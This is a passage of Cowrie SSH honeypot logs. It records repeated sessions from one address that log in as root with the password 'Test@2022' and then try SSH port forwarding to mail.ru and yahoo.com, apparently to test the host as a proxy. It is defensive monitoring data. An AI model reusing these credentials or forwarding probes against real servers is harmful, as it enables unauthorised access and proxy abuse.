":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.232592Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.482276Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23724,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23724","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.533412Z","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.583533Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2925,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2925","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.728874Z","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.779167Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28820,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28820","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.920339Z","session":"82b96b582c96"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:30.970430Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.021359Z","src_ip":"77.83.207.83","session":"82b96b582c96"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9776,"dst_ip":"1.2.3.4","dst_port":22,"session":"75f8b98e24ee","protocol":"ssh","message":"New connection: 77.83.207.83:9776 (1.2.3.4:22) [session: 75f8b98e24ee]","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.070379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.071118Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.121613Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.371520Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15056,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15056","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.422704Z","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.472919Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":11794,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11794","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.616339Z","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.666469Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27731,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27731","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.808507Z","session":"75f8b98e24ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.858734Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.909811Z","src_ip":"77.83.207.83","session":"75f8b98e24ee"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9867,"dst_ip":"1.2.3.4","dst_port":22,"session":"1305e01f2fa4","protocol":"ssh","message":"New connection: 77.83.207.83:9867 (1.2.3.4:22) [session: 1305e01f2fa4]","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.958475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:31.959479Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.009346Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.258493Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31064,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31064","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.310104Z","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.360416Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":31188,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31188","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.504308Z","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.554313Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28757,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28757","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.696339Z","session":"1305e01f2fa4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.746551Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.797042Z","src_ip":"77.83.207.83","session":"1305e01f2fa4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9945,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9d98ff0856","protocol":"ssh","message":"New connection: 77.83.207.83:9945 (1.2.3.4:22) [session: 0b9d98ff0856]","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.848369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.849046Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:32.901089Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.159782Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3809,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3809","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.212534Z","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.264981Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":10796,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10796","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.410195Z","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.462077Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":973,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:973","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.606247Z","session":"0b9d98ff0856"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.658207Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.710912Z","src_ip":"77.83.207.83","session":"0b9d98ff0856"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10041,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bd0c21d565b","protocol":"ssh","message":"New connection: 77.83.207.83:10041 (1.2.3.4:22) [session: 6bd0c21d565b]","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.761759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.762549Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:33.814811Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.075586Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2788,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2788","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.128624Z","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.180673Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":28419,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28419","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.326414Z","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.378707Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":32609,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32609","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.526386Z","session":"6bd0c21d565b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.578735Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.631676Z","src_ip":"77.83.207.83","session":"6bd0c21d565b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":10135,"dst_ip":"1.2.3.4","dst_port":22,"session":"d24879e16bbf","protocol":"ssh","message":"New connection: 77.83.207.83:10135 (1.2.3.4:22) [session: d24879e16bbf]","sensor":"my-vps","timestamp":"2025-08-31T03:49:34.680199Z"}
